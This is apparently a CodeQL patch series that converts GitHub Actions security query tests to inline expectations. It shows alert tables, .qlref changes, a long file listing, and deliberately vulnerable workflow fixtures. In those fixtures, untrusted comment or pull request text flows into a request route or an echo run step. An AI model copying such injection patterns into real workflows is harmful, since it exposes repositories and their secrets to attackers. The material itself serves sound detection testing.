.github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:60:9:60:37 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test10.yml:8:3:8:21 | pull_request_target | pull_request_target | -| .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test11.yml:5:3:5:15 | issue_comment | issue_comment | -| .github/workflows/test17.yml:12:15:19:12 | Uses Step | .github/workflows/test17.yml:12:15:19:12 | Uses Step | .github/workflows/test17.yml:19:15:23:58 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test17.yml:3:5:3:16 | workflow_run | workflow_run | -| .github/workflows/test27.yml:18:9:21:6 | Uses Step | .github/workflows/test27.yml:18:9:21:6 | Uses Step | .github/workflows/test27.yml:21:9:22:16 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test26.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test29.yml:8:7:14:4 | Uses Step | .github/workflows/test29.yml:8:7:14:4 | Uses Step | .github/workflows/test29.yml:14:7:21:11 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test29.yml:1:5:1:23 | pull_request_target | pull_request_target | -| .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | issue_comment | -| .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | issue_comment | -| .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:47:7:51:46 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | issue_comment | -| .github/workflows/untrusted_checkout.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout.yml:15:9:18:2 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/untrusted_checkout.yml:2:3:2:21 | pull_request_target | pull_request_target | -| .github/workflows/untrusted_checkout.yml:23:9:26:6 | Uses Step | .github/workflows/untrusted_checkout.yml:23:9:26:6 | Uses Step | .github/workflows/untrusted_checkout.yml:30:9:32:23 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/untrusted_checkout.yml:2:3:2:21 | pull_request_target | pull_request_target | diff --git a/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.qlref b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.qlref index 9f17733e16e8..667c7a786389 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.qlref +++ b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.qlref @@ -1 +1,2 @@ -Security/CWE-829/UntrustedCheckoutCritical.ql +query: Security/CWE-829/UntrustedCheckoutCritical.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.qlref b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.qlref index 66b3f2cd9bf2..84af7bdc7237 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.qlref +++ b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.qlref @@ -1 +1,2 @@ -Security/CWE-829/UntrustedCheckoutHigh.ql +query: Security/CWE-829/UntrustedCheckoutHigh.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.qlref b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.qlref index 55bb194f5ecd..1cb2407ccc7a 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.qlref +++ b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.qlref @@ -1 +1,2 @@ -Security/CWE-829/UntrustedCheckoutMedium.ql +query: Security/CWE-829/UntrustedCheckoutMedium.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.qlref b/actions/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.qlref index 1887390c0f3d..e3d739264b2c 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.qlref +++ b/actions/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.qlref @@ -1 +1,2 @@ -experimental/Security/CWE-829/UnversionedImmutableAction.ql +query: experimental/Security/CWE-829/UnversionedImmutableAction.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-918/.github/workflows/test.yml b/actions/ql/test/query-tests/Security/CWE-918/.github/workflows/test.yml index 6937467453b2..849f1cdf8ec4 100644 --- a/actions/ql/test/query-tests/Security/CWE-918/.github/workflows/test.yml +++ b/actions/ql/test/query-tests/Security/CWE-918/.github/workflows/test.yml @@ -6,5 +6,5 @@ jobs: steps: - uses: octokit/request-action@v2 with: - route: ${{ github.event.comment.body }} + route: ${{ github.event.comment.body }} # $ Alert diff --git a/actions/ql/test/query-tests/Security/CWE-918/RequestForgery.expected b/actions/ql/test/query-tests/Security/CWE-918/RequestForgery.expected index d980139bb357..5387cf2ebabb 100644 --- a/actions/ql/test/query-tests/Security/CWE-918/RequestForgery.expected +++ b/actions/ql/test/query-tests/Security/CWE-918/RequestForgery.expected @@ -1,6 +1,6 @@ +#select +| .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | Potential request forgery in $@, which may be controlled by an external user. | .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | ${{ github.event.comment.body }} | edges nodes | .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | semmle.label | github.event.comment.body | subpaths -#select -| .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | Potential request forgery in $@, which may be controlled by an external user. | .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | ${{ github.event.comment.body }} | diff --git a/actions/ql/test/query-tests/Security/CWE-918/RequestForgery.qlref b/actions/ql/test/query-tests/Security/CWE-918/RequestForgery.qlref index 5479b022be0f..46eea075c3c3 100644 --- a/actions/ql/test/query-tests/Security/CWE-918/RequestForgery.qlref +++ b/actions/ql/test/query-tests/Security/CWE-918/RequestForgery.qlref @@ -1 +1,2 @@ -experimental/Security/CWE-918/RequestForgery.ql +query: experimental/Security/CWE-918/RequestForgery.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/SyntaxError/.github/workflows/malformed.yml b/actions/ql/test/query-tests/SyntaxError/.github/workflows/malformed.yml index a8bfa4ae19a2..60f4b010f6d1 100644 --- a/actions/ql/test/query-tests/SyntaxError/.github/workflows/malformed.yml +++ b/actions/ql/test/query-tests/SyntaxError/.github/workflows/malformed.yml @@ -4,4 +4,4 @@ jobs: test: runs-on: ubuntu-latest steps: - - run: echo ${{ github.event.pull_request.body}} + - run: echo ${{ github.event.pull_request.body}} # $ Alert diff --git a/actions/ql/test/query-tests/SyntaxError/SyntaxError.qlref b/actions/ql/test/query-tests/SyntaxError/SyntaxError.qlref index 97c5686103cf..f2bd2df19cbb 100644 --- a/actions/ql/test/query-tests/SyntaxError/SyntaxError.qlref +++ b/actions/ql/test/query-tests/SyntaxError/SyntaxError.qlref @@ -1 +1,2 @@ -Debug/SyntaxError.ql +query: Debug/SyntaxError.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/defaultable_workflow.yml b/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/defaultable_workflow.yml index 31f43d8b8b29..301de120d6f9 100644 --- a/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/defaultable_workflow.yml +++ b/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/defaultable_workflow.yml @@ -52,7 +52,7 @@ jobs: # Autobuild attempts to build any compiled languages (C/C++, C#, or Java). # If this step fails, then you should remove it and run the build manually (see below) - - name: Autobuild + - name: Autobuild # $ Alert uses: github/codeql-action/autobuild@v3 # â„¹ï¸ Command-line programs to run using the OS shell. diff --git a/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.qlref b/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.qlref index 75a8fe2398a6..1cdc74dec251 100644 --- a/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.qlref +++ b/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.qlref @@ -1 +1,2 @@ -Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.ql \ No newline at end of file +query: Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql From 27c62aa9b774078d21d2512cb71093791e53d90d Mon Sep 17 00:00:00 2001 From: "copilot-swe-agent[bot]" <198982749+Copilot@users.noreply.github.com> Date: Thu, 11 Jun 2026 20:31:39 +0000 Subject: [PATCH 10/15] Fix ql inline expectation conversion recipe --- .../.github/workflows/reusable_workflow.yml | 10 +- .../Models/CompositeActionsSinks.expected | 6 +- .../Models/CompositeActionsSinks.qlref | 3 +- .../Models/CompositeActionsSources.expected | 12 +- .../Models/CompositeActionsSources.qlref | 4 +- .../Models/CompositeActionsSummaries.expected | 4 +- .../Models/CompositeActionsSummaries.qlref | 4 +- .../Models/ReusableWorkflowsSinks.expected | 4 +- .../Models/ReusableWorkflowsSinks.qlref | 4 +- .../Models/ReusableWorkflowsSources.expected | 4 +- .../Models/ReusableWorkflowsSources.qlref | 4 +- .../ReusableWorkflowsSummaries.expected | 4 +- .../Models/ReusableWorkflowsSummaries.qlref | 4 +- .../query-tests/Models/action1/action.yml | 16 +- .../CWE-074/.github/workflows/output1.yml | 8 +- .../CWE-074/.github/workflows/output2.yml | 18 +- .../CWE-074/OutputClobberingHigh.expected | 18 +- .../CWE-074/OutputClobberingHigh.qlref | 3 +- .../.github/workflows/artifactpoisoning51.yml | 4 +- .../.github/workflows/artifactpoisoning52.yml | 4 +- .../.github/workflows/artifactpoisoning53.yml | 4 +- .../CWE-077/.github/workflows/path1.yml | 18 +- .../CWE-077/.github/workflows/test10.yml | 4 +- .../CWE-077/.github/workflows/test11.yml | 4 +- .../CWE-077/.github/workflows/test12.yml | 8 +- .../CWE-077/.github/workflows/test13.yml | 4 +- .../CWE-077/.github/workflows/test14.yml | 4 +- .../CWE-077/.github/workflows/test15.yml | 4 +- .../CWE-077/.github/workflows/test16.yml | 6 +- .../CWE-077/.github/workflows/test2.yml | 4 +- .../CWE-077/.github/workflows/test3.yml | 4 +- .../CWE-077/.github/workflows/test4.yml | 36 +- .../CWE-077/.github/workflows/test5.yml | 4 +- .../CWE-077/.github/workflows/test6.yml | 12 +- .../CWE-077/.github/workflows/test7.yml | 4 +- .../CWE-077/.github/workflows/test8.yml | 8 +- .../CWE-077/.github/workflows/test9.yml | 4 +- .../CWE-077/EnvPathInjectionCritical.expected | 12 +- .../CWE-077/EnvPathInjectionCritical.qlref | 3 +- .../CWE-077/EnvPathInjectionMedium.expected | 2 +- .../CWE-077/EnvPathInjectionMedium.qlref | 3 +- .../CWE-077/EnvVarInjectionCritical.expected | 74 +- .../CWE-077/EnvVarInjectionCritical.qlref | 3 +- .../CWE-077/EnvVarInjectionMedium.expected | 2 +- .../CWE-077/EnvVarInjectionMedium.qlref | 3 +- .../.github/workflows/comment_issue.yml | 2 +- .../CWE-078/CommandInjectionCritical.expected | 4 +- .../CWE-078/CommandInjectionCritical.qlref | 3 +- .../CWE-078/CommandInjectionMedium.expected | 2 +- .../CWE-078/CommandInjectionMedium.qlref | 3 +- .../.github/workflows/arg_injection.yml | 26 +- .../ArgumentInjectionCritical.expected | 26 +- .../CWE-088/ArgumentInjectionCritical.qlref | 3 +- .../CWE-088/ArgumentInjectionMedium.expected | 2 +- .../CWE-088/ArgumentInjectionMedium.qlref | 3 +- .../.github/actions/action1/action.yml | 2 +- .../.github/actions/action3/action.yml | 2 +- .../.github/actions/action4/action.yml | 2 +- .../.github/actions/action5/action.yml | 6 +- .../.github/actions/action6/action.yml | 2 +- .../.github/actions/action7/action.yml | 8 +- .../.github/actions/clone-repo/action.yaml | 2 +- .../external/ultralytics/actions/action.yaml | 4 +- .../.github/workflows/argus_case_study.yml | 4 +- .../.github/workflows/artifactpoisoning1.yml | 4 +- .../.github/workflows/artifactpoisoning2.yml | 4 +- .../.github/workflows/artifactpoisoning3.yml | 4 +- .../.github/workflows/artifactpoisoning4.yml | 4 +- .../.github/workflows/artifactpoisoning5.yml | 4 +- .../.github/workflows/artifactpoisoning6.yml | 6 +- .../.github/workflows/artifactpoisoning7.yml | 4 +- .../.github/workflows/artifactpoisoning8.yml | 4 +- .../.github/workflows/changed-files.yml | 12 +- .../.github/workflows/comment_issue.yml | 14 +- .../workflows/comment_issue_newline.yml | 6 +- .../workflows/composite-action-caller-3.yml | 6 +- .../workflows/composite-action-caller-4.yml | 4 +- .../CWE-094/.github/workflows/cross3.yml | 6 +- .../CWE-094/.github/workflows/discussion.yml | 4 +- .../.github/workflows/discussion_comment.yml | 6 +- .../.github/workflows/publishResults.yml | 4 +- .../.github/workflows/reusable-workflow.yml | 10 +- .../CWE-094/.github/workflows/gollum.yml | 8 +- .../workflows/image_link_generator.yml | 4 +- .../CWE-094/.github/workflows/inter-job0.yml | 4 +- .../CWE-094/.github/workflows/inter-job1.yml | 4 +- .../CWE-094/.github/workflows/inter-job2.yml | 4 +- .../CWE-094/.github/workflows/inter-job4.yml | 4 +- .../CWE-094/.github/workflows/inter-job5.yml | 2 +- .../CWE-094/.github/workflows/issues.yaml | 16 +- .../CWE-094/.github/workflows/json_wrap.yml | 4 +- .../CWE-094/.github/workflows/level0.yml | 4 +- .../CWE-094/.github/workflows/level1.yml | 2 +- .../.github/workflows/priv_pull_request.yml | 2 +- .../.github/workflows/pull_request_review.yml | 16 +- .../workflows/pull_request_review_comment.yml | 16 +- .../.github/workflows/pull_request_target.yml | 16 +- .../CWE-094/.github/workflows/push.yml | 20 +- .../workflows/push_and_workflow_dispatch.yml | 20 +- .../.github/workflows/reusable-workflow-1.yml | 10 +- .../.github/workflows/reusable-workflow-2.yml | 10 +- .../workflows/reusable-workflow-caller-1.yml | 2 +- .../workflows/reusable-workflow-caller-2.yml | 2 +- .../workflows/reusable-workflow-caller-3.yml | 2 +- .../CWE-094/.github/workflows/self_needs.yml | 6 +- .../CWE-094/.github/workflows/simple1.yml | 4 +- .../CWE-094/.github/workflows/simple2.yml | 4 +- .../CWE-094/.github/workflows/simple3.yml | 4 +- .../.github/workflows/slash_command2.yml | 2 +- .../CWE-094/.github/workflows/test.yml | 4 +- .../CWE-094/.github/workflows/test1.yml | 4 +- .../CWE-094/.github/workflows/test10.yml | 12 +- .../CWE-094/.github/workflows/test11.yml | 6 +- .../CWE-094/.github/workflows/test12.yml | 2 +- .../CWE-094/.github/workflows/test13.yml | 8 +- .../CWE-094/.github/workflows/test14.yml | 16 +- .../CWE-094/.github/workflows/test15.yml | 16 +- .../CWE-094/.github/workflows/test16.yml | 8 +- .../CWE-094/.github/workflows/test17.yml | 16 +- .../CWE-094/.github/workflows/test18.yml | 4 +- .../CWE-094/.github/workflows/test19.yml | 84 +- .../CWE-094/.github/workflows/test2.yml | 8 +- .../CWE-094/.github/workflows/test20.yml | 2 +- .../CWE-094/.github/workflows/test21.yml | 6 +- .../CWE-094/.github/workflows/test24.yml | 4 +- .../CWE-094/.github/workflows/test25.yml | 4 +- .../CWE-094/.github/workflows/test26.yml | 6 +- .../CWE-094/.github/workflows/test27.yml | 4 +- .../CWE-094/.github/workflows/test29.yml | 2 +- .../CWE-094/.github/workflows/test3.yml | 4 +- .../CWE-094/.github/workflows/test4.yml | 6 +- .../CWE-094/.github/workflows/test5.yml | 2 +- .../CWE-094/.github/workflows/test7.yml | 8 +- .../CWE-094/.github/workflows/test8.yml | 4 +- .../CWE-094/.github/workflows/test9.yml | 12 +- .../.github/workflows/untrusted_checkout1.yml | 4 +- .../.github/workflows/workflow_run.yml | 16 +- .../workflows/workflow_run_branches1.yml | 2 +- .../workflows/workflow_run_branches2.yml | 2 +- .../workflows/workflow_run_branches3.yml | 2 +- .../workflows/workflow_run_branches4.yml | 2 +- .../workflows/workflow_run_branches5.yml | 2 +- .../CWE-094/CodeInjectionCritical.expected | 334 +-- .../CWE-094/CodeInjectionCritical.qlref | 3 +- .../CWE-094/CodeInjectionMedium.expected | 118 +- .../CWE-094/CodeInjectionMedium.qlref | 3 +- .../CWE-1395/.github/workflows/test1.yml | 4 +- .../CWE-1395/UseOfKnownVulnerableAction.qlref | 4 +- .../CWE-200/.github/workflows/test1.yml | 2 +- .../CWE-200/SecretExfiltration.expected | 4 +- .../Security/CWE-200/SecretExfiltration.qlref | 4 +- .../CWE-275/.github/workflows/perms1.yml | 2 +- .../CWE-275/.github/workflows/perms10.yml | 2 +- .../CWE-275/.github/workflows/perms2.yml | 2 +- .../CWE-275/.github/workflows/perms5.yml | 2 +- .../CWE-275/.github/workflows/perms6.yml | 2 +- .../CWE-275/.github/workflows/perms7.yml | 2 +- .../CWE-275/.github/workflows/perms8.yml | 2 +- .../CWE-275/.github/workflows/perms9.yml | 2 +- .../CWE-275/MissingActionsPermissions.qlref | 4 +- .../CWE-284/.github/workflows/test1.yml | 16 +- .../CodeExecutionOnSelfHostedRunner.qlref | 4 +- .../CWE-285/.github/workflows/test1.yml | 2 +- .../CWE-285/ImproperAccessControl.qlref | 4 +- .../workflows/secrets-in-artifacts.yml | 10 +- .../CWE-312/.github/workflows/test1.yml | 10 +- .../CWE-312/ExcessiveSecretsExposure.qlref | 4 +- .../Security/CWE-312/SecretsInArtifacts.qlref | 4 +- .../CWE-312/UnmaskedSecretExposure.qlref | 4 +- .../.github/workflows/code_injection1.yml | 2 +- .../.github/workflows/direct_cache1.yml | 4 +- .../.github/workflows/direct_cache2.yml | 4 +- .../.github/workflows/direct_cache3.yml | 4 +- .../.github/workflows/direct_cache4.yml | 4 +- .../.github/workflows/direct_cache5.yml | 4 +- .../.github/workflows/direct_cache6.yml | 4 +- .../.github/workflows/poisonable_step1.yml | 10 +- .../.github/workflows/poisonable_step2.yml | 4 +- .../.github/workflows/poisonable_step3.yml | 2 +- .../.github/workflows/poisonable_step4.yml | 2 +- .../.github/workflows/poisonable_step5.yml | 4 +- .../CachePoisoningViaCodeInjection.expected | 4 +- .../CachePoisoningViaCodeInjection.qlref | 4 +- .../CachePoisoningViaDirectCache.expected | 14 +- .../CachePoisoningViaDirectCache.qlref | 4 +- .../CachePoisoningViaPoisonableStep.expected | 16 +- .../CachePoisoningViaPoisonableStep.qlref | 4 +- .../CWE-367/.github/workflows/comment.yml | 6 +- .../CWE-367/.github/workflows/test0.yml | 6 +- .../CWE-367/.github/workflows/test4.yml | 4 +- .../CWE-367/.github/workflows/test5.yml | 8 +- .../CWE-367/.github/workflows/test6.yml | 10 +- .../UntrustedCheckoutTOCTOUCritical.expected | 22 +- .../UntrustedCheckoutTOCTOUCritical.qlref | 3 +- .../CWE-367/UntrustedCheckoutTOCTOUHigh.qlref | 3 +- .../CWE-571/.github/workflows/test1.yml | 22 +- .../CWE-571/.github/workflows/test2.yml | 22 +- .../ExpressionIsAlwaysTrueCritical.qlref | 3 +- .../CWE-571/ExpressionIsAlwaysTrueHigh.qlref | 3 +- .../actions/dangerous-git-checkout/action.yml | 2 +- .../actions/download-artifact-2/action.yaml | 2 +- .../actions/download-artifact/action.yaml | 2 +- .../.github/actions/unpinned-tag/action.yml | 2 +- .../workflows/actor_trusted_checkout.yml | 4 +- .../workflows/artifactpoisoning101.yml | 6 +- .../.github/workflows/artifactpoisoning11.yml | 4 +- .../.github/workflows/artifactpoisoning12.yml | 4 +- .../.github/workflows/artifactpoisoning21.yml | 6 +- .../.github/workflows/artifactpoisoning22.yml | 6 +- .../.github/workflows/artifactpoisoning31.yml | 4 +- .../.github/workflows/artifactpoisoning32.yml | 4 +- .../.github/workflows/artifactpoisoning33.yml | 4 +- .../.github/workflows/artifactpoisoning34.yml | 4 +- .../.github/workflows/artifactpoisoning41.yml | 4 +- .../.github/workflows/artifactpoisoning42.yml | 4 +- .../.github/workflows/artifactpoisoning71.yml | 6 +- .../.github/workflows/artifactpoisoning81.yml | 4 +- .../.github/workflows/artifactpoisoning91.yml | 4 +- .../.github/workflows/artifactpoisoning92.yml | 6 +- .../.github/workflows/artifactpoisoning96.yml | 2 +- .../CWE-829/.github/workflows/auto_ci.yml | 18 +- .../CWE-829/.github/workflows/dependabot2.yml | 2 +- .../CWE-829/.github/workflows/dependabot3.yml | 4 +- .../TestRepo/.github/workflows/reusable.yml | 4 +- .../CWE-829/.github/workflows/gitcheckout.yml | 4 +- .../issue_comment_3rd_party_action.yml | 6 +- .../workflows/issue_comment_direct.yml | 10 +- .../workflows/issue_comment_heuristic.yml | 4 +- .../workflows/issue_comment_octokit.yml | 12 +- .../workflows/issue_comment_octokit2.yml | 8 +- .../workflows/label_trusted_checkout1.yml | 4 +- .../workflows/label_trusted_checkout2.yml | 6 +- .../CWE-829/.github/workflows/level0.yml | 10 +- .../CWE-829/.github/workflows/mend.yml | 4 +- .../CWE-829/.github/workflows/poc.yml | 8 +- .../CWE-829/.github/workflows/poc2.yml | 6 +- .../CWE-829/.github/workflows/poc3.yml | 2 +- .../CWE-829/.github/workflows/pr-workflow.yml | 44 +- .../workflows/priv_pull_request_checkout.yml | 2 +- .../.github/workflows/resolve-args.yml | 2 +- .../.github/workflows/reusable_local.yml | 4 +- .../CWE-829/.github/workflows/test10.yml | 4 +- .../CWE-829/.github/workflows/test11.yml | 4 +- .../CWE-829/.github/workflows/test12.yml | 2 +- .../CWE-829/.github/workflows/test13.yml | 4 +- .../CWE-829/.github/workflows/test14.yml | 4 +- .../CWE-829/.github/workflows/test15.yml | 4 +- .../CWE-829/.github/workflows/test17.yml | 6 +- .../CWE-829/.github/workflows/test18.yml | 6 +- .../CWE-829/.github/workflows/test22.yml | 2 +- .../CWE-829/.github/workflows/test25.yml | 4 +- .../CWE-829/.github/workflows/test27.yml | 4 +- .../CWE-829/.github/workflows/test28.yml | 2 +- .../CWE-829/.github/workflows/test29.yml | 4 +- .../CWE-829/.github/workflows/test3.yml | 2 +- .../CWE-829/.github/workflows/test4.yml | 2 +- .../CWE-829/.github/workflows/test7.yml | 12 +- .../CWE-829/.github/workflows/test8.yml | 2 +- .../CWE-829/.github/workflows/test9.yml | 2 +- .../.github/workflows/unpinned_tags.yml | 6 +- .../.github/workflows/untrusted_checkout.yml | 8 +- .../.github/workflows/untrusted_checkout2.yml | 2 +- .../.github/workflows/untrusted_checkout3.yml | 2 +- .../.github/workflows/untrusted_checkout4.yml | 8 +- .../workflow_run_untrusted_checkout.yml | 4 +- .../workflow_run_untrusted_checkout_2.yml | 4 +- .../ArtifactPoisoningCritical.expected | 38 +- .../CWE-829/ArtifactPoisoningCritical.qlref | 4 +- .../CWE-829/ArtifactPoisoningMedium.expected | 2 +- .../CWE-829/ArtifactPoisoningMedium.qlref | 4 +- .../ArtifactPoisoningPathTraversal.qlref | 4 +- .../Security/CWE-829/UnpinnedActionsTag.qlref | 3 +- .../UntrustedCheckoutCritical.expected | 80 +- .../CWE-829/UntrustedCheckoutCritical.qlref | 3 +- .../CWE-829/UntrustedCheckoutHigh.qlref | 3 +- .../CWE-829/UntrustedCheckoutMedium.qlref | 3 +- .../CWE-829/UnversionedImmutableAction.qlref | 3 +- .../CWE-918/.github/workflows/test.yml | 2 +- .../Security/CWE-918/RequestForgery.expected | 4 +- .../Security/CWE-918/RequestForgery.qlref | 3 +- .../.github/workflows/malformed.yml | 2 +- .../query-tests/SyntaxError/SyntaxError.qlref | 3 +- .../workflows/defaultable_workflow.yml | 2 +- .../UnnecessaryUseOfAdvancedConfig.qlref | 3 +- .../old.dbscheme | 2578 +++++++++++++++++ .../semmlecode.cpp.dbscheme | 2577 ++++++++++++++++ .../upgrade.properties | 2 + cpp/ql/lib/semmle/code/cpp/Type.qll | 2 +- cpp/ql/lib/semmlecode.cpp.dbscheme | 3 +- .../old.dbscheme | 2577 ++++++++++++++++ .../semmlecode.cpp.dbscheme | 2578 +++++++++++++++++ .../upgrade.properties | 2 + .../CWE/CWE-078/WordexpTainted.expected | 4 +- .../AllocMultiplicationOverflow.expected | 20 +- .../ArrayAccessProductFlow.expected | 38 +- .../ConstantSizeArrayOffByOne.expected | 44 +- .../tests/PrivateCleartextWrite.expected | 24 +- .../DecompressionBombs.expected | 28 +- .../name_qualifiers/NameQualifiers1.expected | 4 + .../Critical/MemoryFreed/DoubleFree.expected | 30 +- .../MemoryFreed/UseAfterFree.expected | 50 +- .../MissingCheckScanf.expected | 44 +- .../CastArrayPointerArithmetic.expected | 20 +- .../NonConstantFormat.expected | 40 +- .../ReturnStackAllocatedMemory.expected | 34 +- .../UsingExpiredStackAddress.expected | 56 +- .../RedundantNullCheckSimple.expected | 36 +- .../SAMATE/TaintedPath/TaintedPath.expected | 4 +- .../SAMATE/ExecTainted/ExecTainted.expected | 4 +- .../semmle/ExecTainted/ExecTainted.expected | 50 +- .../CWE/CWE-079/semmle/CgiXss/CgiXss.expected | 8 +- .../UncontrolledProcessOperation.expected | 4 +- .../UncontrolledProcessOperation.expected | 22 +- .../SAMATE/OverflowDestination.expected | 2 +- .../SAMATE/OverrunWriteProductFlow.expected | 32 +- .../CWE-119/SAMATE/UnboundedWrite.expected | 2 +- .../semmle/tests/OverflowDestination.expected | 10 +- .../semmle/tests/UnboundedWrite.expected | 6 +- .../semmle/tests/UnboundedWrite.expected | 12 +- .../ImproperArrayIndexValidation.expected | 4 +- .../ImproperArrayIndexValidation.expected | 10 +- .../SAMATE/UncontrolledFormatString.expected | 8 +- .../CWE-134/semmle/argv/argvLocal.expected | 50 +- .../semmle/consts/NonConstantFormat.expected | 48 +- .../CWE-134/semmle/funcs/funcsLocal.expected | 18 +- .../UncontrolledFormatString.expected | 12 +- .../CWE/CWE-134/semmle/ifs/ifs.expected | 24 +- .../CWE-190/SAMATE/ArithmeticTainted.expected | 4 +- .../SAMATE/ArithmeticUncontrolled.expected | 26 +- .../ArithmeticUncontrolled.expected | 56 +- .../TaintedAllocationSize.expected | 42 +- .../semmle/tainted/ArithmeticTainted.expected | 24 +- .../AuthenticationBypass.expected | 14 +- .../tests/CleartextBufferWrite.expected | 6 +- .../semmle/tests/CleartextFileWrite.expected | 32 +- .../tests/CleartextTransmission.expected | 82 +- .../CWE/CWE-319/UseOfHttp/UseOfHttp.expected | 14 +- .../CWE/CWE-326/InsufficientKeySize.expected | 8 +- .../tests/UseAfterFree/UseAfterFree.expected | 30 +- .../semmle/tests/UninitializedLocal.expected | 30 +- .../CWE-497/SAMATE/ExposedSystemData.expected | 2 +- .../PotentiallyExposedSystemData.expected | 4 +- .../PotentiallyExposedSystemData.expected | 36 +- .../Security/CWE/CWE-611/XXE.expected | 62 +- .../TaintedCondition.expected | 4 +- .../CWE/CWE-843/TypeConfusion.expected | 20 +- .../CWE-918/RequestForgery.expected | 2 +- .../backdoor/PotentialTimeBomb.expected | 18 +- .../ProcessNameToHashTaintFlow.expected | 2 +- .../UnsafeYearConstruction.expected | 8 +- .../CWE-312/CleartextStorage.expected | 20 +- .../DontInstallRootCert.expected | 8 +- .../InsecureSQLConnection.expected | 8 +- .../ExposureOfPrivateInformation.expected | 12 +- .../HardcodedConnectionString.expected | 6 +- .../CWE-798/HardcodedCredentials.expected | 18 +- .../query-suite/not_included_in_qls.expected | 1 + ...6-ssrf-ipv6-transition-incomplete-guard.md | 4 + .../SsrfIpv6TransitionIncompleteGuard.qhelp | 59 + .../SsrfIpv6TransitionIncompleteGuard.ql | 129 + .../CWE-094-dataURL/CodeInjection.expected | 10 +- .../EnvValueAndKeyInjection.expected | 6 +- .../EnvValueInjection.expected | 8 +- ...JwtWithoutVerificationLocalSource.expected | 14 +- .../decodeJwtWithoutVerification.expected | 14 +- 